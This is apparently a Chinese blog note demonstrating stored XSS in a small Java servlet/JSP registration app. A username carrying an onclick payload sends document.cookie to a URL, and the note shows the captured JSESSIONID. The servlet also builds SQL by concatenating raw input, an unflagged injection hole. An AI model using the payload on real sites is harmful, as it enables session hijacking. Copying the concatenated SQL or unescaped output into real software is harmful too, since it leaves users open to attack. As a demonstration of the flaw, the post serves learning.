花了点时间做了一个注册用户的页面和显示用户的页面,还有两个httpservlet。
注册用户的代码:
<form action="register"> username:<input type="text" name="username"><br> password:<input type="password" name="password"><br> phone:<input type="text" name="phone"><br> <input type="submit" value="register"> </form>
@Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String username = req.getParameter("username"); String password = req.getParameter("password"); String phone = req.getParameter("phone"); String insertSQL = "insert into tb_user values ('" + username + "', '" + password + "', '" + phone + "')"; DBUtil.executeSQL(insertSQL); }
@Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String selectSQL = "select username, password, phone from tb_user"; Statement stmt = null; ResultSet rs = null; List<User> userList = new ArrayList<User>(); try { stmt = DBUtil.createStatement(); rs = stmt.executeQuery(selectSQL); while (rs.next()) { User user = new User(rs.getString(1), rs.getString(2), rs.getString(3)); userList.add(user); } } catch (SQLException e) { throw new ServletException(e); } finally { DBUtil.closeResultSet(rs); DBUtil.closeStatement(stmt); } req.setAttribute("user_list", userList); req.getRequestDispatcher("showuser.jsp").forward(req, resp); }
<body> <% List<User> userList = (List<User>) request.getAttribute("user_list"); for (int i = 0; i < userList.size(); i++) { User user = userList.get(i); %> <div> username:<%=user.getUsername() %><br> phone:<%=user.getPhone() %><br> </div> <% } %> </body>
username为
<a href=# onclick=\"document.location=\'index.jsp?c=\'+escape\(document.cookie\)\;\">Hacker</a>在显示用户的页面上显示为:
看到用户Hacker是带链接的,然后点击一下,显示:
看到浏览器的地址栏里,参数是JSESSIONID%3D7B0C11B6826B67D3E4D9967837F2C48D,session的id是7B0C11B6826B67D3E4D9967837F2C48D。
这种XSS属于Persistent XSS。
获得session id的方法:
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Insert title here</title> </head> <body> session id:<%=session.getId()%><br> <script type="text/javascript"> document.write(escape(document.cookie)); </script> </body> </html>
session id:9A7A5F89EBFC598FEC18FC003706A899 JSESSIONID%3D9A7A5F89EBFC598FEC18FC003706A899